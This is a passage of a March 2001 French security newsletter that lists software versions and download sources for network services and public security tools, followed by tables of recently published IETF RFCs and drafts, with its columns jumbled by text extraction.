Remarquablement conçu, COBRA pêche cependant par l'absence regrettable d'une documentation détaillant le
contenu des différentes bases de connaissances et des modules associés.
Complément d’information
http://www.securityauditor.net/iso17799/solution.htm
http://www.ca-systems.zetnet.co.uk/cobdown.htm
http://www.security.kirion.net/securite/
http://www.iso17799software.com/
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 13/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
LO
OG
GIIC
CIIE
EL
LS
S LIIB
BR
RE
ES
S
LES
SERVICES DE BASE
Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons
d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme
dédiée.
RESEAU
Nom
BIND
DHCP
NTP4
WU-FTP
Fonction
Ver.
Gestion de Nom (DNS)
Serveur d'adresse
Serveur de temps
Serveur de fichiers
9.1.1
3.0b2pl23
4.0.99k
2.6.1
Date
Source
28/03/01
22/03/01
20/07/00
02/07/00
http://www.isc.org/products/BIND
http://www.isc.org/products/DHCP/dhcp-v3.html
http://www.eecis.udel.edu/~ntp
http://www.wu-ftpd.org
MESSAGERIE
Nom
IMAP4
POP3
SENDMAIL
Fonction
Ver.
Relevé courrier
Relevé courrier
Serveur de courrier
2000c
3.1
8.12.0b5
Fonction
Ver.
Date
Source
20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html
07/04/00 http://www.eudora.com/qpopper_general/
11/03/01 http://www.sendmail.org
WEB
Nom
APACHE
ModSSL
MySQL
SQUID
1.3.19
2.0.14a
API SSL Apache 1.3.17 2.8.1
Base SQL
3.23.36
Cache WEB
2.4s1
Serveur WEB
Date
Source
28/02/01
10/03/01
03/03/01
28/03/01
20/03/01
http://httpd.apache.org/dist
http://www.modssl.org/
http://www.mysql.com/downloads/index.html
http://www.squid-cache.org
AUTRE
Nom
Fonction
Ver.
INN
MAJORDOMO
OpenCA
OpenLDAP
Gestion
Gestion
Gestion
Gestion
2.3.1
1.94.5
0.2.0-5
2.0.7
LES
des news
des listes
de certificats
de l'annuaire
Date
Source
11/01/01
15/01/00
26/01/01
06/11/00
http://www.isc.org/products/INN
http://www.greatcircle.com/majordomo
http://www.openca.org
http://www.openldap.org
OUTILS
Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les
tableaux suivants.
LANGAGES
Nom
Fonction
Ver.
Perl
PHP
Scripting
WEB Dynamique
5.6.0
4.0.4pl1
Date
Source
23/03/00 http://www.cpan.org/src/index.html
11/01/01 http://www.php.net
ANALYSE RESEAU
Nom
Big Brother
Dsniff
EtherEal
IP Traf
Nstreams
SamSpade
Fonction
Ver.
Visualisateur snmp
Boite à outils
Analyse multiprotocole
Statistiques IP
Générateur de règles
Boite à outils
1.7.a
2.3
0.8.16
2.4.0
1.0.0
1.14
Date
Source
17/03/01
17/12/00
06/03/01
20/03/01
11/11/00
10/12/99
http://maclawran.ca/bb-dnld/new-dnld.html
http://www.monkey.org/~dugsong/dsniff
http://www.ethereal.com
http://cebu.mozcom.com/riker/iptraf/
http://www.hsc.fr/ressources/outils/nstreams/download/
http://www.samspade.org/ssw/
ANALYSE DE JOURNAUX
Nom
Fonction
Ver.
Analog
Autobuse
WebAlizer
Journaux serveur http
Analyse syslog
Journaux serveur http
4.16
1.13
2.01-06
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Date
Source
13/02/01 http://www.analog.cx
31/01/00 http://www.picante.com/~gtaylor/autobuse
17/10/00 http://www.mrunix.net/webalizer/
Page 14/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
ANALYSE DE SECURITE
Nom
Fonction
Ver.
Nessus
nMap
Vulnérabilité réseau
Vulnérabilité réseau
nMapNT
Pandora
Saint
Sara
Tara (tiger)
Trinux
Vulnérabilité réseau
Vulnérabilité Netware
Vulnérabilité réseau
Vulnérabilité réseau
Vulnérabilité système
Boite à outils
1.0.7a
2.53
2.54B22
SP1
4.0b2.1
3.1.8b1
3.3.5
2.0.9
0.8pre1
Date
Source
30/01/00
05/09/00
10/03/01
25/10/00
12/02/99
26/03/01
25/03/01
07/09/99
22/10/00
http://www.nessus.org
http://www.insecure.org/nmap
http://www.eeye.com/html/Research/Tools/nmapnt.html
http://www.packetfactory.net/projects/pandora/
http://www.wwdsi.com/saint
http://www-arc.com/sara
http://www-arc.com/tara
http://www.io.com/~mdfranz/trinux/boot-images/
CONFIDENTIALITE
Nom
Fonction
Ver.
OpenPGP
GPG
Signature/Chiffrement
Signature/Chiffrement
1.0.4p1
Date
Source
http://www.openpgp.org/
30/11/00 http://www.gnupg.org
CONTROLE D'ACCES
Nom
Fonction
Ver.
TCP Wrapper
Xinetd
Accès services TCP
Inetd amélioré
7.6
2.1.89p14
Date
Source
ftp://ftp.cert.org/pub/tools/tcp_wrappers
18/01/01 http://www.xinetd.org
CONTROLE D'INTEGRITE
Nom
Fonction
Ver.
Tripwire
Intégrité LINUX
2.3.47
Date
Source
15/08/00 http://www.tripwire.org/downloads/index.php
DETECTION D'INTRUSION
Nom
Fonction
Deception TK Pot de miel
Snort
IDS Système
Shadow
IDS Réseau
Ver.
19990818
1.7
1.6
Date
Source
18/08/99 http://all.net/dtk/dtk.html
05/01/01 http://www.snort.org
01/07/00 http://www.nswc.navy.mil/ISSEC/CID/
GENERATEURS DE TEST
Nom
Fonction
Ver.
FireWalk
FragRouter
IPSend
IDSWakeUp
TcpReplay
UdpProbe
Analyse filtres
Fragments IP
Paquets IP
Détection d'intrusion
Sessions TCP
Paquets UDP
1.0
1.6
2.1a
1.0
1.0.1
1.2
Fonction
Ver.
PareFeu FreeBsd
Filtre datagramme
PareFeu Linux
PareFeu Linux
3.1
3.4.16
Experim.
0.1.6
Date
Source
03/02/01
21/09/97
19/09/97
13/10/00
19/05/97
13/02/96
http://www.packetfactory.net/firewalk
http://www.anzen.com/research/nidsbench/
ftp://coombs.anu.edu.au/pub/net/misc
http://www.hsc.fr/ressources/outils/idswakeup/download/
http://www.anzen.com/research/nidsbench/
http://sites.inka.de/sites/bigred/sw/udpprobe.txt
PARE-FEUX
Nom
DrawBridge
IpFilter
Cooker
Sinus
Date
Source
19/04/00
15/01/01
26/02/01
01/09/00
http://drawbridge.tamu.edu
http://coombs.anu.edu.au/ipfilter/ip-filter.html
http://www.linux-mandrake.com/fr/cookerdevel.php3
http://www.ifi.unizh.ch/ikm/SINUS/firewall
TUNNELS
Nom
Fonction
Ver.
CIPE
FreeSwan
http-tunnel
Pile Crypto IP (CIPE)
Pile IPSec
Encapsulation http
OpenSSL
OpenSSH
SSF
Stunnel
Zebedee
Pile SSL
Pile SSH 1 et 2
Pile SSH 1 autorisée
Proxy https
Tunnel TCP/UDP
1.5.1
1.8
3.0.5
3.3 (dev)
0.9.6ab2
2.5.2
1.2.27.6
3.14
2.2.1
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Date
Source
11/02/01
04/12/00
06/12/00
08/03/01
21/03/01
19/03/01
16/09/99
22/02/01
09/02/01
http://sites.inka.de/sites/bigred/devel/cipe.html
http://www.freeswan.org
http://www.nocrew.org/software/httptunnel.html
http://www.openssl.org/
http://www.openssh.com/
http://info.in2p3.fr/secur/ssf
http://www.stunnel.org
http://www.winton.org.uk/zebedee/
Page 15/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
NO
OR
RM
ME
ES
SE
ET
T ST
TA
AN
ND
DA
AR
RD
DS
S
LES
LES
PUBLICATIONS DE L'IETF
RFC
Du 23/02/2001 au 23/03/2001, 14 RFC ont été publiés dont 3 RFC ayant trait à la
sécurité.
RFC TRAITANT DE LA SÉCURITÉ
Thème
Num Date Etat Titre
COPS
DNS
TERENA
3084
3090
3067
03/01 Pst
03/01 Pst
02/01 Inf
COPS Usage for Policy Provisioning (COPS-PR)
DNS Security Extension Clarification on Zone Status
TERENA'S Incident object Description and Exchange Format Requirements
RFC TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ
Thème
DOCSIS
L2TP
Num Date Etat Titre
3083
3070
3077
03/01 Inf
02/01 Pst
03/01 Pst
Baseline Privacy Int. MIB for DOCSIS Compliant Cable Modems & Cable Modem Terminat. Systems
Layer Two Tunneling Protocol (L2TP) over Frame Relay
A Link-Layer Tunneling Mechanism for Unidirectional Links
AUTRES RFC
Thème
BEEP
DHC
PFR
SLP
SXDF
URN
VLAN
LES
Num Date Etat Titre
3080
3081
3074
3073
3082
3072
3085
3069
03/01
03/01
02/01
03/01
03/01
03/01
03/01
02/01
Pst
Pst
Pst
Inf
Exp
Inf
Inf
Inf
The Blocks Extensible Exchange Protocol Core
Mapping the BEEP Core onto TCP
DHC Load Balancing Algorithm
Portable Font Resource (PFR) - application/font-tdpfr MIME Sub-type Registration
Notification and Subscription for SLP
Structured Data Exchange Format (SDXF)
URN Namespace for NewsML Resources
VLAN Aggregation for Efficient IP Address Allocation
DRAFTS
Du 23/02/2001au 23/03/2001, 473 drafts ont été publiés: 320 drafts mis à jour, 153
nouveaux drafts, dont 75 drafts ayant directement trait à la sécurité.
NOUVEAUX DRAFTS TRAITANT DE LA SÉCURITÉ
Thème
Nom du Draft
Date Titre
AAA
BGP
COPS
DIAMETER
DNSEXT
HTTP
IPSEC
draft-irtf-aaaarch-generic-struct-00
draft-declercq-bgp-mpls-vpn-sec-ext-00
draft-ietf-rap-cops-tls-00
draft-hiller-aaa-diamaka-00
draft-ietf-dnsext-obsolete-iquery-00
draft-burdis-http-sasl-00
draft-gleeson-ipsec-ppvpn-00
draft-ietf-ipsp-ipsec-conf-mib-00
draft-ietf-krb-wg-kerberos-referrals-00
draft-blumenthal-keygen-00
draft-dupont-mipv6-aaa-00
draft-castelluccia-mobileip-privacy-00
draft-glass-mobileip-security-issues-00
draft-le-mobileip-authreq-00
draft-le-mobileip-keydistribution-00
draft-le-mobileip-sharedsecret-00
draft-behringer-mpls-security-00
draft-ietf-pkix-2797-bis-00
draft-ietf-pkix-impersonation-00
draft-naffah-cat-sasl-sm2-00
draft-sterman-sip-radius-00
draft-ietf-snmpv3-usm-v2-rfc2574bis-00
27/02
26/02
28/02
27/02
28/02
05/03
27/02
28/02
02/03
27/02
26/02
26/02
28/02
27/02
27/02
27/02
26/02
09/03
27/02
05/03
26/02
27/02
KERB
KEYGEN
MIPV6
MOBILEIP
MPLS
PKIX
SASL
SIP
SNMPV3
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Structure of a Generic AAA Server
Considerations about possible security ext. to BGP/MPLS VPN
COPS Over TLS
DIAMETER Support for Authentication and Key Agreement (AKA)
Obsoleting IQUERY
Upgrading to SASL Within HTTP/1.1
Uses of IPsec with Provider Provisioned VPNs
IPsec Policy Configuration MIB
Generating KDC Referrals to locate Kerberos realms
Secure Session Key Generation using SHA-1
AAA for mobile IPv6
A Simple Privacy Extension for Mobile IPv6
Security Issues in Mobile IP
Challenge-Response Authentication Request
Key distribution mechanisms for Mobile IPv6
Temp. Shared Key Function for secure deleg. of sec. to the LAN
Analysis of the Security of the MPLS Architecture
Certificate Management Messages over CMS
Internet X.509 PKI Impersonation Certificate Profile
SM2 -- A Session Management Capable SASL Mechanism
Digest Authentication in SIP using RADIUS
User-based Security Model (USM) for SNMP V3
Page 16/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
SRTP
TLS
draft-ietf-snmpv3-vacm-v2-00
draft-ietf-avt-srtp-00
draft-ietf-tls-delegation-00
draft-ietf-tls-srp-00
27/02
27/02
02/03
08/03
View-based Access Control Model (VACM) for SNMP
The Secure Real Time Transport Protocol
TLS Delegation Protocol
Using SRP for TLS Authentication
MISE À JOUR DE DRAFTS TRAITANT DE LA SÉCURITÉ
Thème
Nom du Draft
AAA
draft-irtf-aaaarch-aaa-pol-01
draft-perkins-aaav6-03
draft-taal-aaaarch-generic-pol-01
COPS
draft-jacquenet-ip-te-cops-01
DIAMETER draft-calhoun-diameter-strong-crypto-07
draft-kaushik-diameter-strong-sec-01
DNS
draft-ietf-dnsext-dnssec-roadmap-02
draft-ietf-dnsext-gss-tsig-02
draft-ietf-dnsop-keyhand-04
draft-kosters-dnsext-dnssec-opt-in-01
IDS
draft-ietf-idwg-beep-idxp-01
IPSEC
draft-ietf-ipsp-config-policy-model-02
draft-ietf-ipsp-ipsecpib-02
draft-stenberg-ipsec-nat-traversal-02
KERB
draft-hornstein-snmpv3-ksm-02
draft-ietf-cat-iakerb-06
draft-ietf-cat-kerberos-pk-init-13
draft-ietf-cat-kerberos-revisions-08
draft-ietf-cat-kerberos-set-passwd-04
draft-ietf-kink-reqmt-02
draft-ietf-krb-wg-krb-dns-locate-02
LDAPEXT draft-ietf-ldapext-acl-model-07
MIME
draft-ietf-openpgp-mime-05
MOBILEIP draft-ietf-mobileip-aaa-key-04
draft-perkins-mobileip-gen-key-03
draft-soliman-mobileip-routeopt-mipv6-01
MPLS
draft-schrijvp-mpls-ldp-end-to-end-auth-03
PKIX
draft-ietf-pkix-ipki-pkalgs-02
draft-ietf-pkix-new-part1-05
draft-ietf-pkix-ocspv2-02
draft-ietf-pkix-rfc2510bis-03
draft-ietf-pkix-rfc2511bis-01
PPPEXT
draft-ietf-pppext-eap-srp-01
RADIUS
draft-aboba-radius-ipv6-07
draft-congdon-radius-8021x-10
SACRED
draft-ietf-sacred-framework-01
SCEP
draft-nourse-scep-04
SIP
draft-ietf-sip-privacy-01
draft-rosenberg-sip-entfw-01
SMIME
draft-ietf-smime-examples-06
draft-ietf-smime-symkeydist-03
SMTP
draft-hoffman-rfc2487bis-05
SOCKS
draft-ietf-ngtrans-socks-gateway-06
SSH
draft-galb-secsh-gssapi-01
draft-ietf-secsh-auth-kbdinteract-02
draft-ietf-secsh-gsskeyex-01
draft-ietf-secsh-publickeyfile-01
draft-ietf-secsh-transport-09
TLS
draft-ietf-tls-misty1-01
draft-trostle-win2k-cat-kerberos-set-passwd-01
WIN2K
Date Titre
05/03
07/03
05/03
01/03
06/03
27/02
28/02
07/03
02/03
06/03
28/02
06/03
02/03
28/02
02/03
02/03
02/03
07/03
08/03
02/03
01/03
06/03
01/03
05/03
05/03
06/03
05/03
07/03
08/03
07/03
01/03
01/03
01/03
06/03
16/03
05/03
28/02
05/03
07/03
28/02
08/03
28/02
02/03
05/03
12/03
06/03
05/03
08/03
05/03
08/03
Policy in AAA
AAA for IPv6 Network Access
Policies in a Generic AAA Environment
A COPS client-type for IP traffic engineering
DIAMETER Strong Security Extension
DIAMETER Strong Security Extension using Kerberos v5
DNS Security Document Roadmap
GSS Algorithm for TSIG (GSS-TSIG)
Handling of DNS Zone Signing Keys
DNSSEC Opt-in for Large Zones
The Intrusion Detection Exchange Protocol (IDXP)
IPsec Configuration Policy Model
IPSec Policy Information Base
IPsec NAT-Traversal
A Kerberos Security Model for SNMPv3
Initial Auth. & Pass Through Auth. Using Kerberos V5 & GSS-API
Public Key Cryptography for Initial Authentication in Kerberos
The Kerberos Network Authentication Service (V5)
Kerberos Set/Change Password: Version 2
Kerberized Internet Negotiation of Keys
Distributing Kerberos KDC and Realm Information with DNS
Access Control Model for LDAP
MIME Security with OpenPGP
AAA Registration Keys for Mobile IP
Generalized Key Distribution Extensions for Mobile IP
Security Assoc. Establisht for Mobile IPv6 Route Optim. using AAA
End to end authentication for LDP
Algorithms & Identifiers for the X.509 PKI Certificate & CRI Profile
Internet X.509 PKI Certificate & CRL Profile
Online Certificate Status Protocol, version 2
Internet X.509 PKI Certificate Management Protocols
Internet X.509 PKI Certificate Request Message Format (CRMF)
PPP EAP SRP-SHA1 Authentication Protocol
RADIUS and IPv6
IEEE 802.1X RADIUS Usage Guidelines
Securely Available Credentials - Framework
Cisco Systems' Simple Certificate Enrollment Protocol (SCEP)
SIP Extensions for Caller Identity and Privacy
SIP Traversal through Residential & Enterprise NATs & Firewalls
Examples of S/MIME Messages
S/MIME Symmetric Key Distribution
SMTP Service Extension for Secure SMTP over TLS
A SOCKS-based IPv6/IPv4 Gateway Mechanism
SSH GSS-API Authentication Method
Generic Message Exchange Authentication For SSH
Using GSSAPI authentication for key exchange in Secure Shell
SECSH Public Key File Format
SSH Transport Layer Protocol
Addition of MISTY1 to TLS
Extending Change Password for Setting Kerberos Passwords
DRAFTS TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ
Thème
Nom du Draft
AAA
AGENT
BGP
draft-irtf-aaaarch-pol-acct-02
draft-kinnear-agent-vpn-id-00
draft-declercq-bgp-ipsec-vpn-01
draft-fedyk-bgpvpon-auto-00
draft-nguyen-bgp-ipv6-vpn-01
draft-ouldbrahim-bgpvpn-auto-01
BMWG
draft-ietf-bmwg-dsmterm-00
CONFIG
draft-joslin-config-schema-01
COPS
draft-ietf-rap-acct-fr-pib-01
DHCP
draft-johnson-vpn-id-option-00
DIAMETER draft-calhoun-diameter-res-mgmt-08
draft-calhoun-diameter-sun-ping-01
draft-ietf-aaa-diameter-01
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Date Titre
07/03
08/03
05/03
27/02
05/03
02/03
27/02
07/03
08/03
08/03
05/03
05/03
05/03
Policy-based Accounting
VPN Identifier sub-option for Relay Agent Information Option
BGP/IPsec VPN
BGP based Auto-Discovery mechanism for Optical VPNs
BGP-MPLS VPN extension for IPv6 VPN over an IPv4 infrastructure
Using BGP as an Auto-Discovery Mech. for Network-based VPNs
Term. for Benchmarking Network-layer Traffic Control Mechanis.
A Configuration Schema for LDAP Based Directory User Agents
Framework of COPS-PR Policy Inform. Base for Accounting Usage
DHCP VPN Information option
DIAMETER Resource Management Extensions
Diameter Sun Ping Extensions
Diameter Base Protocol
Page 17/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
DIFFSER
IP
ISCSI
LDAP
LDAPEXT
MIME
MOBILEIP
MPLS
OSPF
PIB
POLICY
RFC2547
RSVP
SNMP
TRADE
UMTP
VPN
draft-ietf-aaa-diameter-accounting-01
draft-ietf-aaa-diameter-framework-01
draft-ietf-aaa-diameter-mobileip-01
draft-ietf-aaa-diameter-nasreq-01
draft-kempf-diameter-api-04
draft-ietf-diffserv-pib-03
draft-huttunen-ipsec-esp-in-udp-01
draft-ietf-ips-iscsi-reqmts-01
draft-ietf-ldup-model-06
draft-ietf-ldup-subentry-07
draft-rharrison-lburp-03
draft-zeilenga-ldap-cancel-02
draft-zeilenga-ldap-namedref-03
draft-ietf-ldapext-locate-05
draft-ietf-ldup-replica-req-07
draft-ietf-ldup-usage-profile-00
draft-zeilenga-ldapv3bis-opattrs-05
draft-ietf-mboned-auto-multicast-00
draft-durand-ngtrans-tunnel-mime-type-02
draft-glass-mobileip-agent-dhcp-proxy-01
draft-thuel-mobileip-tt-01
draft-ietf-mpls-ldp-ft-01
draft-ietf-mpls-rsvp-lsp-tunnel-08
draft-kathirvelu-corevpn-disc-00
draft-kathirvelu-hiervpn-corevpn-00
draft-rosen-vpns-ospf-bgp-mpls-01
draft-hegde-load-balancing-pib-00
draft-ietf-rap-frameworkpib-04
draft-ietf-policy-core-schema-09
draft-ietf-policy-pcim-ext-00
draft-rosen-rfc2547bis-03
draft-rawlins-rsvppcc-pib-01
draft-ietf-snmpconf-diffpolicy-04
draft-ietf-snmpconf-pm-05
draft-ietf-trade-ecml2-spec-00
draft-finlayson-umtp-06
draft-ouldbrahim-vpn-vr-03
draft-worster-ppvpn-layers-00
05/03
05/03
05/03
05/03
05/03
06/03
05/03
02/03
08/03
02/03
06/03
01/03
28/02
07/03
02/03
26/02
01/03
27/02
07/03
02/03
27/02
01/03
27/02
27/02
28/02
28/02
27/02
05/03
05/03
26/02
01/03
07/03
05/03
07/03
26/02
06/03
02/03
26/02
Diameter Accounting Extensions
Diameter Framework Document
Diameter Mobile IP Extensions
Diameter NASREQ Extensions
The DIAMETER API
Differentiated Services Quality of Service Policy Information Base
ESP Encapsulation in UDP NAT Traversal
iSCSI Requirements and Design Considerations
LDAP Replication Architecture
LDAP Subentry Schema
LDAP Bulk Update/Replication Protocol
LDAP Cancel Extended Operation
Named Subordinate References in LDAP Directories
Discovering LDAP Services with DNS
LDAPv3 Replication Requirements
General Usage Profile for LDAPv3 Replication
LDAPv3: All Operational Attributes
IPv4 Automatic Multicast Without Explicit Tunnels (AMT)
MIME TYPE definition for tunnels
Mobile IP Agents as DHCP Proxies
Dynamic Home Addressing in Mobile IP using Transient Tunnels
Fault Tolerance for LDP and CR-LDP
RSVP-TE: Extensions to RSVP for LSP Tunnels
A Core MPLS IP VPN Link Broadcast And Virtual Router Discovery
Hierarchical VPN over MPLS Transport
OSPF as the PE/CE Protocol in BGP/MPLS VPNs
Load Balancing Policy Information Base
Framework Policy Information Base
Policy Framework LDAP Core Schema
Policy Core Information Model Extensions
BGP/MPLS VPNs
RSVP Policy Control Criteria PIB
The DiffServ Policy MIB
Policy Based Management MIB
Electronic Commerce Modeling Language: Version 2 Specification
The UDP Multicast Tunneling Protocol
Network based IP VPN Architecture Using Virtual Routers
A PPVPN Layer Separation: VPN Tunnels and Core Connectivity
AUTRES DRAFTS
Thème
Nom du Draft
Date Titre
3GPP
draft-drage-3gpp-sip-establish-00
draft-drage-3gpp-sip-registration-00
draft-irtf-aaaarch-session-id-00
draft-ietf-acap-authid-03
draft-ietf-acap-book-05
draft-ietf-acap-email-04
draft-ietf-acap-option-04
draft-ietf-acap-pers-05
draft-kinnear-agent-subnet-selection-00
draft-ietf-manet-aodv-08
draft-mrose-apex-access-02
draft-mrose-apex-core-03
draft-mrose-apex-presence-03
draft-kunze-ark-00
draft-heinanen-inarp-uni-01
draft-ietf-pilc-link-arq-issues-01
draft-aboulmagd-ipo-ason-00
draft-gentric-avt-mpeg4-multisl-02
draft-harrison-avt-precision-av-00
draft-ietf-avt-smpte292-video-02
draft-ietf-idr-bgp4-mib-06
draft-jacquenet-qos-ext-bgp-00
draft-jacquenet-qos-nlri-02
draft-mcpherson-bgp-route-oscillation-01
draft-parent-obgp-01
draft-sylee-bia-00
draft-soliman-burp-requirements-00
draft-ietf-calsch-cap-04
draft-walker-ccamp-req-00
draft-day-cdnp-model-05
draft-day-cdnp-scenarios-03
draft-green-cdnp-gen-arch-03
draft-hannu-rohc-signaling-cellular-01
draft-aiello-dhc-appliance-class-01
06/03
05/03
27/02
07/03
01/03
02/03
07/03
01/03
08/03
08/03
28/02
28/02
28/02
27/02
02/03
02/03
26/02
05/03
26/02
05/03
02/03
26/02
26/02
28/02
02/03
28/02
26/02
06/03
26/02
06/03
06/03
08/03
05/03
01/03
AAA
ACAP
AGENT
AODV
APEX
ARK
ARP
ARQ
ASON
AVT
BGP
BIA
BURP
CAP
CCAMP
CDN
CELL
DHCP
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
3GPP IP Multimedia CN Subsystem - Session establishment flows
3GPP IP Multimedia CN Subsystem - Registration flows
Session ID
ACAP Authorization Identifier Datasets Classes
ACAP Bookmarks Dataset Class
ACAP Email Account Dataset Class
ACAP Application Options Dataset Class
ACAP Email Personality Dataset Class
Subnet Selection sub-option for Relay Agent Information Option
Ad Hoc On Demand Distance Vector (AODV) Routing
The APEX Access Service
The Application Exchange Core
The APEX Presence Service
The ARK Persistent Identifier Scheme
Inverse ARP over Unidirectional Virtual Circuits
Link ARQ issues for IP traffic
ASON Architecture and Its Related Protocols
RTP Payload Format for MPEG-4 Streams
Audiovisual Transport with Precision Timing
RTP Payload Format for SMPTE 292M
Definitions of Managed Objects for BGP-4
QoS Extensions to the BGP4 Protocol: motivation and framework
Providing Quality of Service Indication by the BGP-4 Protocol
BGP Persistent Route Oscillation Condition
Optical BGP (OBGP): InterAS lightpath provisioning
Dual Stack Hosts using 'Bump-in-the-API' (BIA)
Basic User Registration Protocol (BURP)
Calendar Access Protocol (CAP)
Common Control & Measurement Plane Framework and Require.
A Model for Content Internetworking
Content Internetworking Scenarios
CDN Peering Architectural Overview
Application signaling over cellular links
Appliance Class Identifier Option for DHCP
Page 18/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
DIFFSER
DNS
DOCSIS
DSR
ECDSA
FAX
FCIP
FDR
GEHCO
GMPLS
GSMP
H323
IANA
ICAP
ICMP
IFCP
IGMP
IMAP
IMPP
INFO
IP
draft-ietf-dhc-concat-00
draft-ietf-dhc-csr-04
draft-ietf-dhc-ddns-resolution-01
draft-ietf-dhc-dhcpv6-17
draft-ietf-dhc-fqdn-option-01
draft-ietf-diffserv-mib-09
draft-coffeystrain-dnsext-privatednstld-00
draft-esibov-dnsext-dynupdtld-00
draft-esibov-dnsop-suppress-queries-00
draft-ietf-dnsext-apl-rr-02
draft-ietf-dnsext-dhcid-rr-02
draft-ietf-dnsext-edns-bind-view-option-00
draft-ietf-dnsext-edns-zone-option-00
draft-ietf-dnsext-ends-unknown-00
draft-ietf-idn-dude-01
draft-ietf-idn-idna-01
draft-ietf-idn-jpchar-01
draft-ietf-idn-nameprep-03
draft-ietf-idn-udns-02
draft-ietf-idn-vidn-01
draft-ietf-urn-dns-ddds-database-04
draft-moore-6to4-dns-02
draft-ietf-ipcdn-device-mibv2-01
draft-ietf-ipcdn-docsisevent-mib-01
draft-ietf-ipcdn-docs-rfmibv2-00
draft-ietf-ipcdn-igmp-mib-02
draft-ietf-ipcdn-qos-mib-05
draft-ietf-manet-dsr-05
draft-ietf-manet-dsrflow-00
draft-blake-wilson-xmldsig-ecdsa-01
draft-ietf-fax-ffpim-01
draft-ietf-fax-service-v2-03
draft-ietf-fax-tiff-fx-extension1-01
draft-chau-fcip-ifcp-encap-00
draft-davies-fdr-reqs-00
draft-hiller-rohc-gehco-01
draft-mccann-rohc-gehcoarch-01
draft-fontana-gmpls-control-g709-00
draft-many-gmpls-architecture-00
draft-doria-gsmp-req-olsr-01
draft-sadler-gsmp-tdm-labels-00
draft-agrawal-sip-h323-interworking-00
draft-levin-iptel-h323-url-scheme-02
draft-albanna-iana-ipv4-mcast-guidelines-01
draft-elson-opes-icap-01
draft-wu-itrace-intention-00
draft-monia-ips-ifcpenc-00
draft-he-mixed-igmp-proxy-00
draft-holbrook-idmr-igmpv3-ssm-01
draft-ietf-idmr-igmp-v3-07
draft-ietf-idmr-igmpv3-and-routing-00
draft-ietf-imapext-annotate-01
draft-leiba-imap-search-multiple-00
draft-nerenberg-imap-channel-00
draft-rosenberg-impp-im-01
draft-rosenberg-impp-presence-01
draft-anderson-req-dyn-part-00
draft-eastlake-xxx-00
draft-ietf-pilc-link-design-05
draft-ietf-poisson-code-02
draft-ietf-seamoby-mm-problem-01
draft-anderson-forces-req-01
draft-durand-ngtrans-6to4-well-known-address-00
IPAC
IPO
draft-francis-ipngwg-unique-site-local-00
draft-govind-seamoby-buffer6-00
draft-holbrook-ssm-arch-02
draft-ietf-ipngwg-addr-arch-v3-05
draft-ietf-ipngwg-ipaddressassign-02
draft-ietf-ipngwg-scoping-arch-02
draft-ietf-tewg-qos-routing-01
draft-itojun-ipv6-anycast-analysis-02
draft-krampell-v6transition-interaction-00
draft-many-ip-optical-framework-03
draft-tsenevir-vpl-ip-00
draft-ymbk-ip6-arpa-delegation-02
draft-tsang-appliances-discuss-00
draft-ellson-ipo-te-link-provisioning-00
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
01/03
01/03
07/03
02/03
07/03
06/03
26/02
27/02
26/02
06/03
07/03
28/02
28/02
28/02
08/03
28/02
05/03
28/02
28/02
08/03
07/03
06/03
02/03
02/03
27/02
02/03
02/03
08/03
07/03
06/03
05/03
12/03
05/03
28/02
28/02
08/03
07/03
26/02
27/02
05/03
26/02
05/03
01/03
02/03
28/02
26/02
27/02
26/02
08/03
02/03
27/02
02/03
26/02
26/02
06/03
07/03
28/02
27/02
07/03
01/03
27/02
26/02
27/02
28/02
28/02
05/03
08/03
07/03
08/03
01/03
01/03
26/02
05/03
05/03
02/03
26/02
02/03
Encoding Long DHCP Options
The Classless Static Route Option for DHCP
Resolution of DNS Name Conflicts Among DHCP Clients
Dynamic Host Configuration Protocol for IPv6 (DHCPv6)
The DHCP Client FQDN Option
MIB for the Differentiated Services Architecture
DNS Top Level Domain For Private Networks
Dynamic DNS Update of the Top Level Domain and Root Zones
Suppressing DNS queries to the names under reserved TLD
A DNS RR Type for Lists of Address Prefixes (APL RR)
A DNS RR for encoding DHCP information
Bind VIEW option in DNS messages
ZONE option in DNS messages
Handling of unknown EDNS0 attributes
DUDE: Differential Unicode Domain Encoding
Internationalizing Host Names In Applications (IDNA)
Japanese characters in multilingual domain name label
Preparation of Internationalized Host Names
Using the Universal Character Set in the Domain Name System
Virtually Internationalized Domain Names (VIDN)
A DDDS Database Using The Domain Name System
6to4 and DNS
Cable Device MIB for DOCSIS compliant Cable Modems …
Event Notification MIB for DOCSIS 1.1 Compliant Cable …
Radio Frequency (RF) Interface MIB for DOCSIS compliant RF int.
App. of IGMP MIB, RFC 2993 & Cable Device MIB, RFC 2669, to …
Data Over Cable System Quality of Service MIB
The Dynamic Source Routing Protocol for Mobile Ad Hoc Networks
Flow State in the Dynamic Source Routing Protocol for Mobile Ad.
ECDSA with XML-Signature Syntax
Full-mode Fax Profile for Internet Mail: FFPIM
A Simple Mode of Facsimile Using Internet Mail
TIFF-FX Extensions 1
FCIP and iFCP Merged Frame Encapsulation Proposal
Future Domain Routing Requirements
Good Enough Header COmpression (GEHCO)
Requirements and Architecture for Zero-Byte Header Compression
GMPLS Signalling Extensions for G.709 Optical Transport Nets.
Generalized Multi-Protocol Label Switching (GMPLS) Architecture
Requirements for adding Optical Switch Support to GSMP
